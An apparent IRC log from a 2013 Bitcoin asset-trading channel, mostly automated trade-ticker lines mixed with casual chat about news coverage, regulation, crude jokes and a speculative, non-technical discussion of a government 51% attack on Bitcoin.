0.00525 = 0.0315 BTC [-] Aug 16 18:28:18 [BTCTC] [ACTIVEMINING] 32 @ 0.00524 = 0.1677 BTC [-] Aug 16 18:28:19 [BTCTC] [ACTIVEMINING] 621 @ 0.005235 = 3.2509 BTC [-] Aug 16 18:28:19 [BTCTC] [ACTIVEMINING] 63 @ 0.005235 = 0.3298 BTC [-] Aug 16 18:28:32 [BTCTC] [DMS.SELLING] 4 @ 0.01764 = 0.0706 BTC [-] Aug 16 18:28:34 [BTCTC] [DMS.MINING] 4 @ 0.0033 = 0.0132 BTC [-] Aug 16 18:28:36 [BTCTC] [DMS.PURCHASE] 4 @ 0.0208 = 0.0832 BTC [+] Aug 16 18:29:16 [BTCTC] [DMS.SELLING] 20 @ 0.01763 = 0.3526 BTC [-] Aug 16 18:29:28 [BTCTC] [DMS.PURCHASE] 20 @ 0.0208 = 0.416 BTC [+] Aug 16 18:31:22 [HAVELOCK] [AM100] 2 @ 0.0384 = 0.0768 BTC [+] Aug 16 18:34:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.03872 BTC [-] Aug 16 18:34:02 [BTCTC] [TAT.ASICMINER] 2 @ 0.03873 = 0.0775 BTC [+] Aug 16 18:37:22 [BTCTC] [BTC-TRADING-PT] 2 @ 0.8447 = 1.6894 BTC [+] Aug 16 18:37:59 [BTCTC] [DMS.SELLING] 1 @ 0.01799 BTC [+] Aug 16 18:39:17 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 16 18:41:23 [BTCTC] [LTC-ATF.B2] 63 @ 0.01043 = 0.6571 BTC [+] Aug 16 18:41:24 [BTCTC] [LTC-ATF.B2] 191 @ 0.01043 = 1.9921 BTC [+] Aug 16 18:42:59 [BTCTC] [LABCOIN] 41 @ 0.00167 = 0.0685 BTC [+] Aug 16 18:43:12 [BTCTC] [LTC-ATF.B2] 19 @ 0.01044 = 0.1984 BTC [+] Aug 16 18:43:15 [BTCTC] [LTC-ATF.B2] 60 @ 0.01044 = 0.6264 BTC [+] Aug 16 18:44:21 [BTCTC] [LTC-ATF.B2] 29 @ 0.010445 = 0.3029 BTC [+] Aug 16 18:44:34 [BTCTC] [LABCOIN] 177 @ 0.00167 = 0.2956 BTC [+] Aug 16 18:44:54 [BTCTC] [LTC-ATF.B2] 300 @ 0.01046 = 3.138 BTC [+] Aug 16 18:45:40 [BTCTC] [LTC-ATF.B2] 500 @ 0.01047 = 5.235 BTC [+] **** BEGIN LOGGING AT Fri Aug 16 18:51:05 2013 Aug 16 18:51:52 [BTCTC] [ACTIVEMINING] 10 @ 0.005298 = 0.053 BTC [+] Aug 16 18:53:15 [BTCTC] [ACTIVEMINING] 14 @ 0.005297 = 0.0742 BTC [-] Aug 16 19:00:28 [BTCTC] [DMS.SELLING] 45 @ 0.01799 = 0.8096 BTC [+] Aug 16 19:00:42 [BTCTC] [BITVPS] 250 @ 0.002901 = 0.7253 BTC [+] Aug 16 19:00:45 [BTCTC] [BITVPS] 100 @ 0.0029 = 0.29 BTC [-] Aug 16 19:00:47 [BTCTC] [BITVPS] 500 @ 0.002757 = 1.3785 BTC [-] Aug 16 19:00:48 [BTCTC] [BITVPS] 1 @ 0.0027 BTC [-] Aug 16 19:01:00 [HAVELOCK] [LABCO] 2 @ 0.00177 = 0.0035 BTC [+] Aug 16 19:03:49 [BTCTC] [ACTIVEMINING] 13 @ 0.005299 = 0.0689 BTC [+] Aug 16 19:06:34 [BTCTC] [ACTIVEMINING] 13 @ 0.005299 = 0.0689 BTC [+] Aug 16 19:06:34 [BTCTC] [ACTIVEMINING] 200 @ 0.0053 = 1.06 BTC [+] Aug 16 19:07:21 http://www.telegraph.co.uk/news/worldnews/europe/switzerland/10247035/Switzerland-opens-drive-in-sex-boxes-to-make-prostitution-safer.html Aug 16 19:07:25 Switzerland opens drive in 'sex boxes' to make prostitution safer - Telegraph Aug 16 19:09:31 [BTCTC] [LABCOIN] 190 @ 0.001688 = 0.3207 BTC [+] Aug 16 19:10:57 [BTCTC] [LABCOIN] 10 @ 0.001688 = 0.0169 BTC [+] Aug 16 19:13:26 wait what Aug 16 19:14:16 fascinating Aug 16 19:16:01 [HAVELOCK] [SDSTM] 2 @ 0.00624 = 0.0125 BTC [-] Aug 16 19:23:44 [BTCTC] [LABCOIN] 20 @ 0.001669 = 0.0334 BTC [-] Aug 16 19:23:45 [BTCTC] [LABCOIN] 25 @ 0.001651 = 0.0413 BTC [-] Aug 16 19:23:47 [BTCTC] [LABCOIN] 16 @ 0.001622 = 0.026 BTC [-] Aug 16 19:23:48 [BTCTC] [LABCOIN] 50 @ 0.001621 = 0.0811 BTC [-] Aug 16 19:23:49 [BTCTC] [LABCOIN] 85 @ 0.00162 = 0.1377 BTC [-] Aug 16 19:23:50 [BTCTC] [LABCOIN] 50 @ 0.001616 = 0.0808 BTC [-] Aug 16 19:23:51 [BTCTC] [LABCOIN] 385 @ 0.001616 = 0.6222 BTC [-] Aug 16 19:23:52 [BTCTC] [LABCOIN] 32 @ 0.001615 = 0.0517 BTC [-] Aug 16 19:23:54 [BTCTC] [LABCOIN] 50 @ 0.001615 = 0.0808 BTC [-] Aug 16 19:23:55 [BTCTC] [LABCOIN] 1000 @ 0.001615 = 1.615 BTC [-] Aug 16 19:23:56 [BTCTC] [LABCOIN] 2000 @ 0.001614 = 3.228 BTC [-] Aug 16 19:23:56 [BTCTC] [LABCOIN] 139 @ 0.001611 = 0.2239 BTC [-] Aug 16 19:23:57 [BTCTC] [LABCOIN] 1 @ 0.00161 BTC [-] Aug 16 19:23:58 [BTCTC] [LABCOIN] 9 @ 0.00161 = 0.0145 BTC [-] Aug 16 19:23:59 [BTCTC] [LABCOIN] 10 @ 0.00161 = 0.0161 BTC [-] Aug 16 19:24:00 [BTCTC] [LABCOIN] 90 @ 0.00161 = 0.1449 BTC [-] Aug 16 19:24:01 [BTCTC] [LABCOIN] 6 @ 0.00161 = 0.0097 BTC [-] Aug 16 19:24:02 [BTCTC] [LABCOIN] 1000 @ 0.00161 = 1.61 BTC [-] Aug 16 19:24:03 [BTCTC] [LABCOIN] 812 @ 0.001609 = 1.3065 BTC [-] Aug 16 19:24:04 [BTCTC] [LABCOIN] 3300 @ 0.001608 = 5.3064 BTC [-] Aug 16 19:24:05 [BTCTC] [LABCOIN] 2065 @ 0.001608 = 3.3205 BTC [-] Aug 16 19:24:07 [BTCTC] [LABCOIN] 1135 @ 0.001608 = 1.8251 BTC [-] Aug 16 19:24:07 [BTCTC] [LABCOIN] 100 @ 0.001605 = 0.1605 BTC [-] Aug 16 19:24:08 [BTCTC] [LABCOIN] 1312 @ 0.001605 = 2.1058 BTC [-] Aug 16 19:24:09 [BTCTC] [LABCOIN] 500 @ 0.001604 = 0.802 BTC [-] Aug 16 19:24:10 [BTCTC] [LABCOIN] 10000 @ 0.001603 = 16.03 BTC [-] Aug 16 19:24:11 [BTCTC] [LABCOIN] 762 @ 0.001601 = 1.22 BTC [-] Aug 16 19:24:12 [BTCTC] [LABCOIN] 500 @ 0.0016 = 0.8 BTC [-] Aug 16 19:24:13 [BTCTC] [LABCOIN] 5500 @ 0.0016 = 8.8 BTC [-] Aug 16 19:24:14 [BTCTC] [LABCOIN] 99 @ 0.0016 = 0.1584 BTC [-] Aug 16 19:24:15 [BTCTC] [LABCOIN] 287 @ 0.001591 = 0.4566 BTC [-] Aug 16 19:24:16 [BTCTC] [LABCOIN] 2300 @ 0.00159 = 3.657 BTC [-] Aug 16 19:24:20 well there certanly are some advantages to pay as you go sex than having a contract Aug 16 19:25:10 You get to keep your stuff in the end Aug 16 19:26:02 it's pay as you come not pay as you go. Aug 16 19:27:17 lol Aug 16 19:27:18 [BTCTC] [BTC-GROWTH] 539 @ 0.1 = 53.9 BTC [+] Aug 16 19:29:56 I like the sign, reverse cowgirl Aug 16 19:30:31 [BTCTC] [DMS.MINING] 20 @ 0.003297 = 0.0659 BTC [-] Aug 16 19:30:32 [BTCTC] [DMS.MINING] 15 @ 0.003299 = 0.0495 BTC [+] Aug 16 19:30:33 [BTCTC] [DMS.MINING] 45 @ 0.0033 = 0.1485 BTC [+] Aug 16 19:30:34 [BTCTC] [DMS.MINING] 69 @ 0.0033 = 0.2277 BTC [+] Aug 16 19:31:52 [BTCTC] [DMS.MINING] 31 @ 0.0033 = 0.1023 BTC [+] Aug 16 19:32:47 [BTCTC] [DMS.MINING] 2 @ 0.00335 = 0.0067 BTC [+] Aug 16 19:35:59 .d Aug 16 19:35:59 50810339.04828 | Next Diff in 1533 blocks | Estimated Change: 14.3497% in 9d 2h 47m 4s Aug 16 19:37:52 [BTCTC] [DMS.MINING] 3 @ 0.0033 = 0.0099 BTC [-] Aug 16 19:39:46 [BTCTC] [LABCOIN] 30 @ 0.001663 = 0.0499 BTC [+] Aug 16 19:40:00 [BTCTC] [DMS.MINING] 5 @ 0.00335 = 0.0168 BTC [+] Aug 16 19:40:17 [BTCTC] [LABCOIN] 12 @ 0.001664 = 0.02 BTC [+] Aug 16 19:41:24 [BTCTC] [LABCOIN] 1 @ 0.00163 BTC [-] Aug 16 19:41:25 [BTCTC] [LABCOIN] 5 @ 0.001681 = 0.0084 BTC [+] Aug 16 19:41:39 [BTCTC] [DMS.PURCHASE] 50 @ 0.02078 = 1.039 BTC [-] Aug 16 19:42:26 [BTCTC] [LABCOIN] 15 @ 0.001629 = 0.0244 BTC [-] Aug 16 19:42:46 [BTCTC] [LABCOIN] 6 @ 0.001629 = 0.0098 BTC [-] Aug 16 19:42:49 [BTCTC] [DMS.SELLING] 4 @ 0.01763 = 0.0705 BTC [-] Aug 16 19:42:49 [BTCTC] [DMS.SELLING] 16 @ 0.01763 = 0.2821 BTC [-] Aug 16 19:42:51 [BTCTC] [DMS.MINING] 1 @ 0.00335 BTC [+] Aug 16 19:42:53 [BTCTC] [DMS.MINING] 20 @ 0.0033 = 0.066 BTC [-] Aug 16 19:42:55 [BTCTC] [DMS.PURCHASE] 20 @ 0.02078 = 0.4156 BTC [-] Aug 16 19:43:35 [BTCTC] [DMS.SELLING] 4 @ 0.01763 = 0.0705 BTC [-] Aug 16 19:43:37 [BTCTC] [DMS.MINING] 4 @ 0.0033 = 0.0132 BTC [-] Aug 16 19:43:39 [BTCTC] [DMS.PURCHASE] 4 @ 0.02078 = 0.0831 BTC [-] Aug 16 19:44:19 [BTCTC] [DMS.SELLING] 50 @ 0.01762 = 0.881 BTC [-] Aug 16 19:44:21 [BTCTC] [DMS.MINING] 50 @ 0.0033 = 0.165 BTC [-] Aug 16 19:44:23 [BTCTC] [DMS.PURCHASE] 50 @ 0.02078 = 1.039 BTC [-] Aug 16 19:45:02 [BTCTC] [DMS.SELLING] 3 @ 0.01762 = 0.0529 BTC [-] Aug 16 19:45:14 [BTCTC] [DMS.PURCHASE] 3 @ 0.02078 = 0.0623 BTC [-] Aug 16 19:52:30 [MPEX] [S.MPOE] 11500 @ 0.00083707 = 9.6263 BTC [+] Aug 16 19:52:57 ;;seen ThickAsThieves Aug 16 19:52:57 ThickAsThieves was last seen in #bitcoin-assets 1 hour, 28 minutes, and 33 seconds ago: https://bitcointalk.org/index.php?topic=274916.msg1521109;topicseen#new Aug 16 19:52:57 [BTCTC] [DMS.SELLING] 1 @ 0.01799 BTC [+] Aug 16 19:53:17 [HAVELOCK] [AM100] 1 @ 0.0384 BTC [+] Aug 16 19:55:22 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [+] Aug 16 19:55:56 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [+] Aug 16 19:57:07 [BTCTC] [DMS.MINING] 3 @ 0.00315 = 0.0095 BTC [-] Aug 16 19:57:09 [BTCTC] [DMS.MINING] 1 @ 0.00315 BTC [-] Aug 16 19:57:10 [BTCTC] [DMS.MINING] 2 @ 0.00315 = 0.0063 BTC [-] Aug 16 19:58:33 [BTCTC] [DMS.MINING] 3 @ 0.003349 = 0.01 BTC [+] Aug 16 19:59:02 [BTCTC] [DMS.MINING] 2 @ 0.00335 = 0.0067 BTC [+] Aug 16 20:01:30 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [+] Aug 16 20:02:10 [BTCTC] [LABCOIN] 21 @ 0.00165 = 0.0347 BTC [+] Aug 16 20:02:12 [BTCTC] [LABCOIN] 1 @ 0.001602 BTC [-] Aug 16 20:02:12 [BTCTC] [LABCOIN] 27 @ 0.001601 = 0.0432 BTC [-] Aug 16 20:02:13 [BTCTC] [LABCOIN] 155 @ 0.001601 = 0.2482 BTC [-] Aug 16 20:04:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.03876 BTC [+] Aug 16 20:07:14 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [+] Aug 16 20:13:36 [BTCTC] [DMS.SELLING] 1 @ 0.01763 BTC [-] Aug 16 20:13:37 [BTCTC] [DMS.SELLING] 22 @ 0.01762 = 0.3876 BTC [-] Aug 16 20:13:38 [BTCTC] [DMS.SELLING] 925 @ 0.01762 = 16.2985 BTC [-] Aug 16 20:13:40 [BTCTC] [DMS.SELLING] 15 @ 0.01762 = 0.2643 BTC [-] Aug 16 20:14:50 [BTCTC] [DMS.PURCHASE] 60 @ 0.02078 = 1.2468 BTC [-] Aug 16 20:17:28 [BTCTC] [DMS.MINING] 14 @ 0.0034 = 0.0476 BTC [+] Aug 16 20:17:31 [BTCTC] [DMS.MINING] 10 @ 0.003405 = 0.0341 BTC [+] Aug 16 20:18:49 [BTCTC] [DMS.PURCHASE] 2 @ 0.02078 = 0.0416 BTC [-] Aug 16 20:18:53 [MPEX] [S.MPOE] 5050 @ 0.00083707 = 4.2272 BTC [+] Aug 16 20:20:16 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [+] Aug 16 20:20:47 hmm, thinking there will be a hype cycle for btc again Aug 16 20:20:53 with all this USG attention Aug 16 20:23:53 http://www.google.com/trends/explore#q=bitcoin&date=today%2012-m&cmpt=q Aug 16 20:23:56 Google Trends Aug 16 20:24:15 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [+] Aug 16 20:24:26 So what are you thinking? Aug 16 20:24:46 Something like this? http://i.imgur.com/xdpLh3B.jpg Aug 16 20:25:54 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00116 = 0.007 BTC [+] Aug 16 20:28:12 [BTCTC] [LABCOIN] 20 @ 0.001661 = 0.0332 BTC [+] Aug 16 20:28:12 [BTCTC] [LABCOIN] 2 @ 0.001662 = 0.0033 BTC [+] Aug 16 20:28:14 [BTCTC] [LABCOIN] 50 @ 0.001662 = 0.0831 BTC [+] Aug 16 20:28:15 [BTCTC] [LABCOIN] 29 @ 0.001668 = 0.0484 BTC [+] Aug 16 20:28:23 sinking hot metal? Aug 16 20:28:29 [BTCTC] [LABCOIN] 2 @ 0.001669 = 0.0033 BTC [+] Aug 16 20:28:51 yeah lol Aug 16 20:29:08 The idea was.. it going down. Aug 16 20:29:25 no Aug 16 20:29:29 i mean the opposite Aug 16 20:29:37 I had just came across the img as you just mentioned it Aug 16 20:29:50 that this will spread awareness possibly mor ethan anything prior Aug 16 20:31:09 I figured as much, just wanted an excuse to use the img :P, but I'm excited! Aug 16 20:32:09 [BTCTC] [BTC-GROWTH] 3 @ 0.1 = 0.3 BTC [+] Aug 16 20:32:51 I think we'll see a major swing depending on the outcome of the Congressional meetings and this NY subpoenas. Aug 16 20:33:20 Nah, it had less effect than the Winklevoss fund news... It seems like those news are having less and less impact and people don't care. Aug 16 20:33:53 That's just news though, what NY and Congress find will impact legislation. Aug 16 20:34:03 It is a much bigger deal. Aug 16 20:34:31 How? Aug 16 20:34:47 [BTCTC] [BTC-GROWTH] 300 @ 0.1 = 30 BTC [+] Aug 16 20:34:49 Do you know what 'Congress' is? lol? Aug 16 20:34:55 it hasnt even happened yet Nam Aug 16 20:35:08 Yes, I know. Aug 16 20:35:08 i'm saying Bitcoin will be all ove rthe news daily now Aug 16 20:35:14 and in Washington Aug 16 20:35:18 and Wall St Aug 16 20:35:19 etc Aug 16 20:35:21 Yup. Aug 16 20:35:24 In your face basically Aug 16 20:35:49 We'll see about that Aug 16 20:35:52 The news alone will drum up buys, but the outcome will effect the longer trend. I think NY will be positive. I don't know what Congress is up to. Aug 16 20:35:57 if people learn about it, theymight also learn it's not the USG's to control Aug 16 20:36:18 No joke. ThickAsThieves, did you see the Foxnews "interview"/report? Aug 16 20:36:22 the us has a government? Aug 16 20:36:23 Let me find the link... Aug 16 20:36:26 and if the USG does regulate it Aug 16 20:36:36 then it will be more legit Aug 16 20:36:39 [BTCTC] [BTC-BOND] 13 @ 0.009996 = 0.1299 BTC [-] Aug 16 20:36:39 and open audiences Aug 16 20:36:52 and maybe Winkels will get their ETF Aug 16 20:37:08 Here's a gem: https://www.youtube.com/watch?v=XSKgVcMC2yc Aug 16 20:38:26 [BTCTC] [ASICMINER-PT] 1 @ 3.87 BTC [+] Aug 16 20:38:28 [BTCTC] [ASICMINER-PT] 1 @ 3.865 BTC [-] Aug 16 20:38:29 [BTCTC] [ASICMINER-PT] 2 @ 3.862 = 7.724 BTC [-] Aug 16 20:39:14 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [+] Aug 16 20:40:25 [BTCTC] [LABCOIN] 30 @ 0.001635 = 0.0491 BTC [-] Aug 16 20:40:27 [BTCTC] [LABCOIN] 85 @ 0.001634 = 0.1389 BTC [-] Aug 16 20:40:27 [BTCTC] [LABCOIN] 4 @ 0.001613 = 0.0065 BTC [-] Aug 16 20:40:28 [BTCTC] [LABCOIN] 37 @ 0.001604 = 0.0593 BTC [-] Aug 16 20:40:29 [BTCTC] [LABCOIN] 300 @ 0.001603 = 0.4809 BTC [-] Aug 16 20:40:31 [BTCTC] [LABCOIN] 625 @ 0.001601 = 1.0006 BTC [-] Aug 16 20:40:32 [BTCTC] [LABCOIN] 1419 @ 0.0016 = 2.2704 BTC [-] Aug 16 20:40:33 [BTCTC] [S.MPOE-PT] 10 @ 0.0008701 = 0.0087 BTC [-] Aug 16 20:40:49 [BTCTC] [DMS.PURCHASE] 700 @ 0.02078 = 14.546 BTC [-] Aug 16 20:41:17 [BTCTC] [S.MPOE-PT] 9 @ 0.00087 = 0.0078 BTC [-] Aug 16 20:41:18 [BTCTC] [S.MPOE-PT] 150 @ 0.0008602 = 0.129 BTC [-] Aug 16 20:41:51 she says "Make it illegal, shut it down." Aug 16 20:42:03 make it illegal! Aug 16 20:42:08 [BTCTC] [LABCOIN] 14 @ 0.001608 = 0.0225 BTC [+] Aug 16 20:42:10 [BTCTC] [LABCOIN] 30 @ 0.001607 = 0.0482 BTC [-] Aug 16 20:42:15 we should make meth illegal Aug 16 20:42:18 shut down all the meth labs Aug 16 20:42:40 lol Aug 16 20:43:00 [BTCTC] [BTC-GROWTH] 99 @ 0.1 = 9.9 BTC [+] Aug 16 20:43:12 I know. How ridiculous. They've had since the last bubble to actually learn something about BTC and they're still spewing nonesene. Aug 16 20:43:33 criminal use US dollar for their work and no one even trys to stop them Aug 16 20:43:57 [BTCTC] [BASIC-MINING] 1 @ 0.3 BTC [-] Aug 16 20:43:58 SHUT DOWN USD! Make it illegal! Aug 16 20:44:07 [BTCTC] [DMS.SELLING] 1 @ 0.01761 BTC [-] Aug 16 20:44:07 http://i.imgur.com/2zYhRH1.jpg Aug 16 20:44:08 [BTCTC] [DMS.MINING] 1 @ 0.003333 BTC [-] Aug 16 20:44:09 THINK OF THE CHILDREN! Aug 16 20:44:10 [BTCTC] [DMS.PURCHASE] 1 @ 0.02078 BTC [-] Aug 16 20:44:16 its just all about tracking the money as Bitcion just reach the mainstream they all will wake up from their long sleep and fight against it until they control it too Aug 16 20:44:52 [BTCTC] [DMS.MINING] 4 @ 0.003333 = 0.0133 BTC [-] Aug 16 20:44:53 [BTCTC] [DMS.MINING] 2 @ 0.003165 = 0.0063 BTC [-] Aug 16 20:45:05 [HAVELOCK] [HIM] 1 @ 0.2001 BTC [+] Aug 16 20:45:37 [HAVELOCK] [AM100] 5 @ 0.0374 = 0.187 BTC [-] Aug 16 20:45:40 [HAVELOCK] [AM100] 3 @ 0.03730001 = 0.1119 BTC [-] Aug 16 20:45:42 [HAVELOCK] [AM100] 11 @ 0.0373 = 0.4103 BTC [-] Aug 16 20:45:44 [HAVELOCK] [AM100] 5 @ 0.0372 = 0.186 BTC [-] Aug 16 20:45:45 [HAVELOCK] [AM100] 69 @ 0.0371 = 2.5599 BTC [-] Aug 16 20:47:04 [HAVELOCK] [AM100] 10 @ 0.037 = 0.37 BTC [-] Aug 16 20:47:08 "if you don't know anything about it, look it up" Aug 16 20:47:29 coming from a place where fox news doesn't exist, i'm mildly surprised at the lucidity of that statement Aug 16 20:47:29 [BTCTC] [BTC-GROWTH] 200 @ 0.1 = 20 BTC [+] Aug 16 20:47:45 This is the norm for fox news Aug 16 20:48:36 idk, I see various news network all the time, it's meh, all more or less the same. Aug 16 20:48:41 plastic face lady was about what i expected Aug 16 20:48:46 Each time I watch fox news... damn Aug 16 20:48:47 but yeah Aug 16 20:48:50 all just talking heads Aug 16 20:49:15 It's like they're in another world altogether Aug 16 20:49:33 All msm can't really be trusted, which is why you have to do your own research. Especially in America Aug 16 20:49:58 [HAVELOCK] [AM1] 1 @ 3.945 BTC [+] Aug 16 20:50:29 [BTCTC] [BTC-GROWTH] 200 @ 0.1 = 20 BTC [+] Aug 16 20:50:33 I do like how he says you can "find it in Google". Aug 16 20:50:43 hahah yeah Aug 16 20:50:53 "No shit?" Aug 16 20:51:04 "so go to youtube, and google 'bitcoin', and learn all about it" Aug 16 20:51:17 "Because we sure as hell aren't going to inform you!" Aug 16 20:51:20 [BTCTC] [BTC-GROWTH] 240 @ 0.1 = 24 BTC [+] Aug 16 20:51:31 [BTCTC] [DMS.MINING] 20 @ 0.00335 = 0.067 BTC [+] Aug 16 20:51:32 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [+] Aug 16 20:51:34 [BTCTC] [DMS.MINING] 220 @ 0.00335 = 0.737 BTC [+] Aug 16 20:51:43 [BTCTC] [DMS.SELLING] 1 @ 0.01797 BTC [+] Aug 16 20:51:56 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [+] Aug 16 20:53:11 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [+] Aug 16 20:53:22 [HAVELOCK] [AM1] 1 @ 3.945 BTC [+] Aug 16 20:53:44 [BTCTC] [BTC-GROWTH] 1 @ 0.1049 BTC [+] Aug 16 20:53:59 [BTCTC] [BTC-GROWTH] 5 @ 0.1049 = 0.5245 BTC [+] Aug 16 20:56:59 Facepalm - New forum advertisment - WTF does theymos approve this ? https://www.bitmit.net/item/15000/?ref=6004 Aug 16 20:57:12 [BTCTC] [DMS.MINING] 2 @ 0.003344 = 0.0067 BTC [-] Aug 16 20:57:44 lol Aug 16 20:58:05 hmmm Aug 16 20:58:50 I mean, WTF is that shit. Like the forum is not a big enough joke already Aug 16 20:59:02 BTC for UTC Aug 16 21:00:23 so what's everybody's general level of security? raise your hand if you generated your PGP keys on an offline computer Aug 16 21:00:52 nope Aug 16 21:01:08 i used my windows xp rtm machine connected to dem intarwebs Aug 16 21:01:28 I used the public computer at the local library Aug 16 21:02:04 [BTCTC] [DMS.MINING] 11 @ 0.003344 = 0.0368 BTC [-] Aug 16 21:02:06 [BTCTC] [DMS.MINING] 7 @ 0.003345 = 0.0234 BTC [+] Aug 16 21:03:00 heh Aug 16 21:03:14 i paid a team of grad students to do mine by hand Aug 16 21:06:11 [BTCTC] [DMS.SELLING] 1 @ 0.01796 BTC [-] Aug 16 21:07:16 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 16 21:08:08 [BTCTC] [DMS.MINING] 3 @ 0.0033 = 0.0099 BTC [-] Aug 16 21:08:43 [BTCTC] [TAT.ASICMINER] 11 @ 0.03899 = 0.4289 BTC [+] Aug 16 21:08:45 [BTCTC] [TAT.ASICMINER] 14 @ 0.03899 = 0.5459 BTC [+] Aug 16 21:08:47 [BTCTC] [TAT.ASICMINER] 65 @ 0.039 = 2.535 BTC [+] Aug 16 21:09:12 [HAVELOCK] [XBOND] 60 @ 0.0010655 = 0.0639 BTC [-] Aug 16 21:11:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [+] Aug 16 21:14:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [+] Aug 16 21:16:35 [BTCTC] [TAT.ASICMINER] 3 @ 0.039 = 0.117 BTC [+] Aug 16 21:17:58 [BTCTC] [DMS.MINING] 5 @ 0.0033 = 0.0165 BTC [-] Aug 16 21:18:49 [HAVELOCK] [XBOND] 2 @ 0.00105515 = 0.0021 BTC [-] Aug 16 21:20:37 the market is out of control Aug 16 21:20:40 [BTCTC] [DMS.MINING] 5 @ 0.0033 = 0.0165 BTC [-] Aug 16 21:22:03 News done right on Bitcoin: https://www.youtube.com/watch?feature=player_embedded&v=Q6B7J5Dgfws Aug 16 21:22:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.039 = 0.117 BTC [+] Aug 16 21:22:13 I forgot about that one. Aug 16 21:24:18 http://www.youtube.com/watch?v=7osGfFTQVtU Aug 16 21:24:21 my response Aug 16 21:24:21 Futurama - Dead language - YouTube Aug 16 21:24:58 Shutup... Aug 16 21:25:01 hehe Aug 16 21:25:10 i'm with kako on this one Aug 16 21:25:26 Too bad because it's good and concise. Aug 16 21:26:41 heh, that is always funny Aug 16 21:28:27 heh Aug 16 21:28:33 yes, that was a reasonable interview Aug 16 21:29:02 leave it to RDI Aug 16 21:29:04 [HAVELOCK] [HIM] 17 @ 0.2001 = 3.4017 BTC [+] Aug 16 21:29:07 [HAVELOCK] [HIM] 10 @ 0.2 = 2 BTC [-] Aug 16 21:29:08 didn't they interview karla homolka? Aug 16 21:29:40 [BTCTC] [TAT.ASICMINER] 5 @ 0.039 = 0.195 BTC [+] Aug 16 21:29:50 Compared to most news I've seen, it was more than reasonable Aug 16 21:30:22 That fox news earlier was pathetic Aug 16 21:31:34 And compared to fox news, it was ungodly good. But then again so is almost anything. Aug 16 21:31:40 [HAVELOCK] [AM1] 1 @ 3.979999 BTC [+] Aug 16 21:33:28 shut it down! Aug 16 21:33:58 FLIP THE SWITCH! HIT THE POWER BUTTON! Aug 16 21:35:12 you guys watched something on fox news and expected some different outcome Aug 16 21:35:53 Yes, I call it madness Aug 16 21:36:15 the whole network is baised you, know Aug 16 21:36:20 i'm sure you are aware Aug 16 21:36:44 it's not as if only some programs are biased Aug 16 21:36:54 it's the whole network that has the slant Aug 16 21:37:08 someone linked it from here ad I watched 30 seconds Aug 16 21:37:12 I think she just pictures Bernanke sitting in his office, watching the news, saying, "Aw, fuck this Bitcoin thing. I'm done with it." and hits a big red button on his desk. Aug 16 21:37:17 it was enough Aug 16 21:37:28 lol right Aug 16 21:38:15 Bernake, to FBI - go find me all teh USB sticks Aug 16 21:38:56 "Yes, this is the FBI, how can I help you Mr. Bernanke?" "Shut down the internet please." "Right away, sir!" Aug 16 21:39:06 jcpham, i think foxnews could go either way with bitcoin Aug 16 21:39:12 thats why i was giving them a chance Aug 16 21:39:19 press release- FBI raided kids basement -confiscated 10 USB sticks- netowrk crippled Aug 16 21:39:35 the hard right *should* like bitcoin on one hand Aug 16 21:39:41 but i can see why they might not Aug 16 21:40:29 [BTCTC] [BTC-GROWTH] 4 @ 0.1049 = 0.4196 BTC [+] Aug 16 21:40:30 [BTCTC] [BTC-GROWTH] 6 @ 0.1049 = 0.6294 BTC [+] Aug 16 21:40:36 lol hollywood Aug 16 21:40:41 ah, it is too late anyway - the network will be at 1PH soon, scattered all over the planet Aug 16 21:40:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.039 = 0.117 BTC [+] Aug 16 21:41:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.039 = 0.156 BTC [+] Aug 16 21:45:16 hi Aug 16 21:45:37 hey mjr, hw have the meetups been doing? Aug 16 21:45:42 how Aug 16 21:45:59 The US gov would only need to spend 1 billion to develop and produce 100x more ASICs than has ever been deployed so far, on the most efficient process as it would become cost effective at that point. Aug 16 21:46:23 The US govt would have to be organized to do that Aug 16 21:46:28 out of the ass numbers but you get the point. Current ASIC makers didn't need close to 1 billion altogether Aug 16 21:46:32 yeah and then the USG starts the first hacker war Aug 16 21:47:02 And they would only have to convine a whole market of semiconductor fabs to destroy an emerging, recurring and highly lucrative market. Aug 16 21:47:26 around the planet at the same time Aug 16 21:47:35 All I'm saying is it is not currently TOO costly to do a 51% attack. Aug 16 21:47:43 Keep churning ASICs out Aug 16 21:47:48 It depends on what the preceived risk is. Aug 16 21:48:04 perceived* Aug 16 21:48:17 They don't need to convince, just pay the fabs for it. Aug 16 21:48:17 Most of the people that make the laws can not use anything but a Iphone Aug 16 21:48:20 If there is no risk, then $1B is a lot. Aug 16 21:48:21 then people move to litecoin Aug 16 21:48:24 If you pay them, they'll deliver Aug 16 21:48:27 all thos egov asics are useless now Aug 16 21:48:33 its a stupid approach Aug 16 21:48:35 Namworld: so assume they'll plug in 1PH. now what? they gonna include only authnticated transactions or what? Aug 16 21:48:42 they are better off attacking the internet and gating that Aug 16 21:48:46 then a 51% attack Aug 16 21:48:50 than* Aug 16 21:48:55 It really is. They'll legislate it out before they try to "mine it out" Aug 16 21:49:23 jurov, constantly reverse and redo a longer chain, orphaning strings of blocks Aug 16 21:49:26 Yeah, the US would really be like a lonely dark spot on the BTC map Aug 16 21:49:39 That would be damaging to the reliability of transactions Aug 16 21:49:39 the rest of the world would keep on Aug 16 21:49:56 Even if it's just 10-20 blocks each time Aug 16 21:50:01 You are assuming that they move fast Aug 16 21:50:04 their priority seems to be taxation, not destroy at all costs 